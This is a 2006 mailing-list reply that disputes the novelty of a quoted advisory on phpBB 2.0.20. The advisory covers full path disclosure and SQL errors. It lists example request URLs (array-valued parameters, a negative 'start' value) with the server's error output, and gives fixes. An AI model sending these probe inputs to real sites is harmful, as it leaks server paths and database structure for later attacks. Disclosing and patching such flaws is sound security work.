Re: phpBB 2.0.20 Full Path Disclosure and SQL Errors
You state these problems exist at php.net and elsewhere, so why is the
subject titled phpbb? php.net even recommends that for production sites
displaying of errors is discouraged. I'm unsure how your report brings
anything new as you specify the valid use of debug and displaying of
errors which are already well known.
On 5 May 2006 cxib@xxxxxxxxxxxxxxxxxx wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> [phpBB 2.0.20 Full Path Disclosure and SQL Errors]
>
> Author: Maksymilian Arciemowicz (cXIb8O3)
> Date:
> - -Written: 1.5.2006
> - -Public: 5.5.2006
>
> from SecurityReason.Com
> CVE:
> - - CVE-2006-2219 Full Path Disclosure
> - - CVE-2006-2220 Sql Errors
>
> - --- 0.Description ---
> phpBB is a high powered, fully scalable, and highly customizable Open Source
> bulletin board package. phpBB has a
>
> user-friendly interface, simple and straightforward administration panel, and
> helpful FAQ. Based on the powerful PHP
>
> server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC
> database servers, phpBB is the ideal
>
> free community solution for all web sites.
> Contact with author http://www.phpbb.com/about.php.
>
> - --- 1. Full Path Disclosure ---
> Many scripts, for example phpBB, have a basic bug. It exists in variables,
> which are being inserted into script, into specific functions. For example
> function htmlspecialchars()
>
> ...
> if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str,
> &str_len, "e_style, &hint_charset, &hint_charset_len) == FAILURE) {
> return;
> }
> ...
>
> As you can see there is a protection from formatting input variable. If the
> variable is other than string, we have error with Full Path Disclosure.
>
> Example:
>
> http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx
>
> - ---Code ---
> if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
> {
> $mode = ( isset($HTTP_POST_VARS['mode']) ) ?
> htmlspecialchars($HTTP_POST_VARS['mode']) :
> htmlspecialchars($HTTP_GET_VARS['mode']);
> }
> else
> {
> $mode = 'joined';
> }
> - ---Code ---
>
> - ---Result ---
> Warning: htmlspecialchars() expects parameter 1 to be string, array given in
> /www/2020/phpBB2/memberlist.php on line 40
>
> Warning: Cannot modify header information - headers already sent by (output
> started at /www/2020/phpBB2/memberlist.php:40) in
> /www/2020/phpBB2/includes/page_header.php on line 483
>
> Warning: Cannot modify header information - headers already sent by (output
> started at /www/2020/phpBB2/memberlist.php:40) in
> /www/2020/phpBB2/includes/page_header.php on line 485
>
> Warning: Cannot modify header information - headers already sent by (output
> started at /www/2020/phpBB2/memberlist.php:40) in
> /www/2020/phpBB2/includes/page_header.php on line 486
> - ---Result ---
>
> http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx
>
> - ---Result ---
> Warning: htmlspecialchars() expects parameter 1 to be string, array given in
> /www/2020/phpBB2/viewtopic.php on line 487
>
> Warning: urlencode() expects parameter 1 to be string, array given in
> /www/2020/phpBB2/viewtopic.php on line 498
>
> Warning: Cannot modify header information - headers already sent by (output
> started at /www/2020/phpBB2/viewtopic.php:487) in
> /www/2020/phpBB2/includes/page_header.php on line 483
>
> Warning: Cannot modify header information - headers already sent by (output
> started at /www/2020/phpBB2/viewtopic.php:487) in
> /www/2020/phpBB2/includes/page_header.php on line 485
>
> Warning: Cannot modify header information - headers already sent by (output
> started at /www/2020/phpBB2/viewtopic.php:487) in
> /www/2020/phpBB2/includes/page_header.php on line 486
> - ---Result ---
>
> Problem appears if display_errors==1, but it exists on many websites. (even
> at php.net).
>
> - --- 2. Sql Errors ---
>
> Problem appears because we can add everything (INT) to the end of SQL query
> (LIMIT). The query will fail if the value is below 0 or above -2^32.
>
> Example:
>
> http://[HOST]/2020/phpBB2/memberlist.php?start=-1
>
> - ---Code ---
> $start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start'])
> : 0;
> - ---Code ---
>
> - ---Result ---
> Could not query users
>
> DEBUG MODE
>
> SQL Error : 1064 You have an error in your SQL syntax; check the manual that
> corresponds to your MySQL server version for the right syntax to use near
> '-1, 50' at line 4
>
> SELECT username, user_id, user_viewemail, user_posts, user_regdate,
> user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm,
> user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE
> user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 50
>
> Line : 151
> File : memberlist.php
> - ---Result ---
>
> - --- 3. How to fix ---
> Turn off display_errors or use function like is_string().
>
> - --- 4. Greets ---
> sp3x
>
> Infospec, p_e_a, krasza, revival, l5x
>
> - --- 5. Contact ---
> Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
> Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
> GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
> SecurityReason.Com
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.2.2 (FreeBSD)
>
> iD8DBQFEW4pi3Ke13X/fTO4RAqV7AJ9PeZ9nbRUYATqArEzLOdenG1ypHwCguPa5
> 7DlqP3M3vq1frb7Zc3y+KrU=
> =4U6Y
> -----END PGP SIGNATURE-----
>
--
Paul Laudanski, Microsoft MVP Windows-Security
[de] http://de.castlecops.com
[en] http://castlecops.com
[wiki] http://wiki.castlecops.com
[family] http://cuddlesnkisses.com
[This message is for the designated recipient(s) only and may contain
privileged or confidential information. If you have received it in error,
please notify the sender immediately and delete the original. Any other
use of the email by you is prohibited.]